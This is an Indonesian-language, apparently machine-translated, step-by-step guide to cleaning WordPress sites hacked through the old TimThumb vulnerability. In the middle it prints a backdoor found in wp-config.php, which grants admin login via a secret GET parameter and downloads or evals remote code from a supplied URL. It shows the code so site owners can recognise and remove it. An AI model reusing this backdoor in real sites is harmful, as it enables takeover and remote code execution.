Jadi jika Anda ingat dengan benar, ada masalah keamanan dengan skrip TimThumb di bulan Agustus yang telah diperbaiki. Meski masih mengejutkan, banyak situs yang masih menggunakan versi lama. Kami telah memperbaiki tiga situs sejauh ini dalam satu bulan terakhir, satu kemarin. Jadi masuk akal untuk hanya menulis artikel selangkah demi selangkah, jadi pengguna kita bisa langsung mengikutinya. Semua dari tiga pengguna bahwa kita memperbaiki masalah ini karena bahkan tidak tahu apa itu TimThumb atau apakah mereka menggunakannya atau tidak.
TimThumb adalah script PHP yang mengubah ukuran gambar. Ada kerentanan di dalamnya, tapi SAFE untuk digunakan sekarang.
Jadi bagaimana Anda tahu bahwa situs Anda diretas? Jika Anda melihat layar merah besar di browser saat mengunjungi situs Anda:
Jika Anda mulai dibombardir dengan email tentang pengguna yang dialihkan dari situs Anda. Kemungkinan besar, kasusnya adalah situs Anda menjadi korban eksploitasi ini.
Sebagai tindakan hati-hati, setiap orang sebaiknya menggunakan Scanner Kerentanan Timthumb ini. Ini akan memberitahu Anda jika Anda menggunakan versi lama TimThumb. Banyak klub tema mengupgrade intinya segera. Jadi plugin ini akan memeriksa apakah versi aman Timthumb yang baru sudah terinstal atau versi yang lebih lama sudah terpasang.
Sekarang jika situs Anda sudah menjadi mangsa eksploitasi Timthumb ini, maka inilah yang perlu Anda lakukan.
Pertama anda perlu menghapus file-file berikut ini:
/wp-admin/upd.php /wp-content/upd.php
Masuk ke panel admin WordPress dan instal ulang versi WordPress Anda. Kami secara khusus ingin menginstal ulang file-file ini:
/wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js
Lalu buka wp-config.php dimana kemungkinan besar Anda akan menemukan kode malware besar ini yang memanen kredensial dan cookies login. Kode ini akan menuju ke bawah.
if (isset ($ _ GET ['pingnow']) && isset ($ _ GET ['pass'])) {
jika ($ _GET ['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') {
if ($ _GET ['pingnow'] == 'login') {
$ user_login = 'admin';
$ user = get_userdatabylogin ($ user_login);
$ user_id = $ user-> ID;
wp_set_current_user ($ user_id, $ user_login);
wp_set_auth_cookie ($ user_id);
do_action ('wp_login', $ user_login);
}
if (($ _GET ['pingnow'] == 'exec') && (isset ($ _ GET ['file']))) {
$ ch = curl_init ($ _ GET ['file']);
$ fnm = md5 (rand (0,100)) '. php';
$ fp = fopen ($ fnm, "w");
curl_setopt ($ ch, CURLOPT_FILE, $ fp);
curl_setopt ($ ch, CURLOPT_HEADER, 0);
curl_setopt ($ ch, CURLOPT_TIMEOUT, 5);
curl_exec ($ ch);
curl_close ($ ch);
fclose ($ fp);
echo "";
}
if (($ _GET ['pingnow'] == 'eval') && (isset ($ _ GET ['file']))) {
$ ch = curl_init ($ _ GET ['file']);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt ($ ch, CURLOPT_HEADER, 0);
curl_setopt ($ ch, CURLOPT_TIMEOUT, 5);
$ re = curl_exec ($ ch);
curl_close ($ ch);
eval ($ re);
}}}
Di map tema Anda, carilah skrip TimThumb mana pun yang mungkin menyimpan file yang di-cache. Biasanya mereka berada dalam struktur ini:
/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php
Hapus semua yang terlihat seperti ini. Jika Anda tidak yakin dengan banyak hal, maka hapus semua yang bukan merupakan file gambar.
Hal berikutnya yang ingin Anda lakukan adalah mengganti timthumb.php dengan versi terbaru yang bisa ditemukan di https://timthumb.googlecode.com/svn/trunk/timthumb.php.
Sekarang akan menjadi ide bagus untuk mengganti kata sandi Anda yang dimulai dengan info login MySQL Anda ke info masuk WordPress Anda. Jangan lupa ganti password untuk MySQL di wp-config.php atau anda akan mendapatkan layar “Error Establishing Connection”.
Ubah kunci rahasia di file wp-config.php Anda. Anda bisa menghasilkan kunci baru dengan membuka generator online.
Sekarang kamu sudah selesai Jangan lupa mengosongkan semua plugin caching halaman. Sebagai tindakan hati-hati, ada baiknya juga menghapus tembolok dan kuki peramban Anda.
Bagi para pengembang, coba gunakan fitur Ukuran Gambar Tambahan di WordPress untuk menggantikan fungsi Timthumb.
Beri tahu kami jika Anda memerlukan bantuan lebih lanjut dengan menggunakan formulir kontak kami.